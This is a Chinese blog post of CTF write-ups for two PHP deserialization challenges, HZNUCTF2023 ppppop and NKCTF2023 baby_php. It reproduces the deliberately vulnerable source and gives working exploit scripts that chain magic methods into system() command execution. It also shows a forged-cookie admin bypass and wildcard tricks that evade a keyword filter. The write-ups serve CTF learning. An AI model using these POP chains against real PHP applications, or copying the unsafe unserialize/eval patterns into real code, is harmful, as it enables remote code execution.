PHP反序列的两道题

已于 2023-03-28 19:29:47 修改
阅读量422 收藏
点赞数
分类专栏: 刷题笔记 文章标签: php web安全 经验分享
于 2023-03-28 19:01:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44640313/article/details/129821028
版权

 HZNUCTF2023-ppppop

参考博客:HZNUCTF2023初赛 (yuque.com)

初赛WriteUp (yuque.com)

打开页面,没有什么东西,抓个包看看(dir一下网站就崩了。。。。)

发现在cookie那里存在一串貌似base64的编码,解码看看是一串序列化后的字符串

直接将isAdmin后面的b:0 改成b:1 伪造身份为admin刷新页面之后源码会高亮出来

成功显示页面源码

<?php
error_reporting(0);
include('utils.php');

class A {
    public $className;
    public $funcName;
    public $args;

    public function __destruct() {
        $class = new $this->className;
        $funcName = $this->funcName;
        $class->$funcName($this->args);
    }
}

class B {
    public function __call($func, $arg) {
        $func($arg[0]);
    }
}

if(checkUser()) {
    highlight_file(__FILE__);
    $payload = strrev(base64_decode($_POST['payload']));
    unserialize($payload);
}

发现这就是一个很简单的php反序列化,链子很简单,其实就是想用A类来调用某个类的某个方法,链子为:__destruct() => __call()

构造exp为

<?php
class A {
    public $className="B";
    public $funcName="system";
    public $args="ls /";  //最后发现flag是在env环境变量中的

}

$a=new A();
$b=base64_encode(strrev(serialize($a)));
echo $b;

?>

nkctf2023-baby_php

参考博客:NKCTF2023&数字人才挑战赛web部分wp - 码农教程 (manongjc.com)

NKCTF2023 web部分wp_丨Arcueid丨的博客-CSDN博客

源码:
<?php
    error_reporting(0);
    class Welcome{
        public $name;
        public $arg = 'oww!man!!';
        public function __construct(){
            $this->name = 'ItS SO CREAZY';
        }
        public function __destruct(){
            if($this->name == 'welcome_to_NKCTF'){
                echo $this->arg;
            }
        }
    }

    function waf($string){
        if(preg_match('/f|l|a|g|\*|\?/i', $string)){
            die("you are bad");
        }
    }
    class Happy{
        public $shell;
        public $cmd;
        public function __invoke(){
            $shell = $this->shell;
            $cmd = $this->cmd;
            waf($cmd);
            eval($shell($cmd));
        }
    }
    class Hell0{
        public $func;
        public function __toString(){
            $function = $this->func;
            $function();
        }
    }

    if(isset($_GET['p'])){
        unserialize($_GET['p']);
    }else{
        highlight_file(__FILE__);
    }
?>

打开环境是一道php反序列化题,开始源码审计

搞出pop链,链子__destruct()->__toString()->__invoke()

这里过滤了f ,l, a,g所以导致我们无法使用ls查看文件目录

但是dir没有杯ban所以这里可以使用dir来进行查看目录

查看目录后flag在/f1ag,然后*?也被禁了

方法一:more类似于env ,[0-z]等于* ,直接使用[a-z]进行通配匹配
more /[0-z]1[0-z][0-z]

exp:
<?php
error_reporting(0);
class Welcome{
    public $name;
    public $arg ;

}


class Happy{
    public $shell;
    public $cmd;

}
class Hell0{
    public $func;

}
$a=new Welcome();
$a->arg='welcome_to_NKCTF';
$a->name=new Hell0();
$a->name->func=new Happy();
$a->name->func->shell="system";
$a->name->func->cmd="more /[0-z]1[0-z][0-z]"; 
echo serialize($a);
?>

方法二:urldecode来绕

参考一个师傅的解法

NKCTF2023 web部分wp_丨Arcueid丨的博客-CSDN博客

0e1G7
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
利用PHAR协议进行PHP序列化攻击1
08-03
乎所有件操作函数都可触发 phar 序列地址:[CISCN2019 华北赛区 Day1 Web1]Dropbox(链接:进后,随意注册账号上传件,上传点
ctfshow(卷王杯)
qq_62046696的博客
09-24 1438
首先我们的前提是if(isset($_POST['a']) && isset($_POST['b']) && isset($_POST['c']))} 这里的name就是上面的string传进来的,但是 $var = $this->$name;array_walk函数的作用就是遍历自定义函数,其中$fn的值为成员的值,prev为成员变量的名字。这是个等于号,相当于赋值,而对于数组无法赋值的情况就是当键溢出就行,可以看到上一句有。如果是数组的话,第一个是类,第二个是方法,第三个是属性。
8-14刷php序列化,Smarty ssti,json命令执行)
Realiy的博客
08-14 922
[NPUCTF2020]ReadlezPHP 找到time.php?source,打开的得到time.php的源码 <?php #error_reporting(0); class HelloPhp { public $a; public $b; public function __construct(){ $this->a = "Y-m-d h:i:s"; $this->b = "date"; } publ
CTFSHOW卷王杯 easy unserialize
Landasika的博客
05-17 1253
<?php include("./HappyYear.php"); class one { public $object; public function MeMeMe() { array_walk($this, function($fn, $prev){ if ($fn[0] === "Happy_func" &&am...
2021-10-3 安全笔记周报(php 序列化的两道)(待更新)
m0_54481455的博客
10-03 4588
Moectf2021 easyunserialize <?php classentrance { public$start; function__construct($start) { $this->start=$start; } function__destruct() { $this->start->helloworld(); } } c...
PHP序列化漏洞(入门)-魔术方法+原生类
xiaoheizi的博客
07-02 1515
_sleep(): //serialize()函数会检查类中是否存在一个魔术方法__sleep() 如果存在,该方法会被优先调用。当对不可访问属性调用 isset() 或 empty() 时,__isset() 会被调用。因为__toString()魔术方法是在把对象当做字符串使用的时候会被调用,所以这里会触发__toString()魔术方法。__isset(): //在不可访问的属性上调用isset()或empty()触发。
深入了解PHP序列化原生类
we
06-05 1359
如果在代码审计或者ctf中,有序列化的功能点,但是却不能构造出完整的pop链,那这时我们应该如何破局呢?我们可以尝试一下从php原生类下手,php有些原生类中内置一些魔术方法,如果我们巧妙构造可控参数,触发并利用其内置魔术方法,就有可能达到一些我们想要的目的。1234567891011我们采用下面脚本遍历一下所有原生类中的魔术方法 Error/ExceptionError 是所有PHP内部错误类的基类。 (PHP 7, 8)**Error::__toString ** error 的字符串表达返回
浅谈PHP中GC回收机制的利用
errorr0
03-16 2183
GC回收及机制,在ctf中不会单独涉及,但是会糅合起来一起考!
【无标
weixin_51387754的博客
09-08 406
ctf可意译为“夺旗赛”。其大致流程是,参赛团队之间通过进行攻防对抗、程序分析等形式,率先从主办方给出的比赛环境中得到一串具有一定格式的字符串或其他内容,并将其提交给主办方,从而夺得分数。为了方便称呼,我们把这样的内容称之为“Flag”。
php-SER-libs-main序列化靶场通关详细思路
qq_73767109的博客
05-30 3679
这里先是要把my类实例化到body中,而project要是my中不存在的方法,理应随便赋值但是在触发__call后call需要输入两个参数,name可以自行赋值,但是func就要在触发时就有参数,所以在给project赋值的时候应该赋参数这样在。主要利用的是session.upload_progress.enabled 当该设置为on 的时候,在向服务器上传任意一个文件的时候php会把该上传文件的详细信息(如上传时间,文件名等)储存在session中,而当我们以。新手学习序列
php代码-ctf payload 第九 序列化 do you know robot
07-15
php代码-ctf payload 第九 序列化 do you know robot
从一道CTF学习PHP序列化漏洞-附件资源
03-02
从一道CTF学习PHP序列化漏洞-附件资源
PHP序列化漏洞总结
u013797594的博客
06-11 2424
PHP序列化漏洞总结
PHP序列化漏洞之产生原因(目练习)
qq_60463414的博客
08-13 2980
PHP序列化漏洞之简单的目练习
web安全-PHP序列化漏洞
weixin_61956136的博客
07-10 2051
web安全-PHP序列化漏洞
PHP序列化&魔术方法&原生类(二)
m0_63917373的博客
11-16 351
PHP序列化 魔术方法 原生类
[HZNUCTF 2023 preliminary]ppppop
qq_73767109的博客
06-10 354
这里在B类中调用system没有,直接触发__call方法并将system作为参数传入__call中造成执行系统命令来查看环境变量从而得到flag。得到源码后就是序列化构造pop链了,不难看出是通过A类来触发B类中的__call从而实现任意命令执行。一片空白的原因可能就是布尔值为0,改成1再base64加密后替换原cookie发包。解码发现是序列化后的字符串而且有一个布尔类型的变量为0。打开一片空白,抓包发现base64加密后的cookie。
字符画生成网站 ascii字符画
最新发布
wow_awsl_qwq的博客
05-12 323
_____ / ___/__ ___ / /__/ _ \/ _ \ \___/ .__/ .__/ /_/ /_/
php序列化漏洞习
09-06
关于PHP序列化漏洞的习,可以使用GlobIterator类和ArrayObject类来进行练习。其中,GlobIterator类的目是被遗忘的序列化,ArrayObject类的目是easy_phpPHP序列化漏洞是一种安全漏洞,其中一个具体的例子是CVE-2016-7124,该漏洞存在于php5<5.6.25和php7<7.0.10的版本中。漏洞的产生原因是由于序列化时对输入的不当处理所导致的。 了解PHP序列化漏洞的习,需要掌握类与对象、序列化基础知识以及一些与魔术方法相关的内容,如构造和折构方法(__construct()、__destruct())、序列化和序列化方法(__sleep()、__wakeup())、错误调用魔术方法(__callStatic()、__get()、__set()、__isset()、__unset()、__clone())等。序列化漏洞的成因较复杂,例如POP链构造、POC链推法等。 此外,还可以学习字符串逃逸和__wakeup魔术方法绕过漏洞的相关知识。其中,__wakeup魔术方法绕过漏洞的产生原因是__wakeup方法可以在序列化时被绕过,从而可能导致安全漏洞。 PHP序列化漏洞还可以通过引用的利用方法来进行学习。另外,还可以学习SESSION序列化漏洞和phar序列化漏洞的习。其中,SESSION序列化漏洞涉及到不同处理器的不同储存格式,而phar序列化漏洞需要了解phar的构造和使用条件。 通过这些习的学习,可以更好地理解PHP序列化漏洞以及如何进行防范和修复。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [PHP序列化漏洞(最全面最详细有例)](https://blog.csdn.net/m0_73728268/article/details/129893800)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值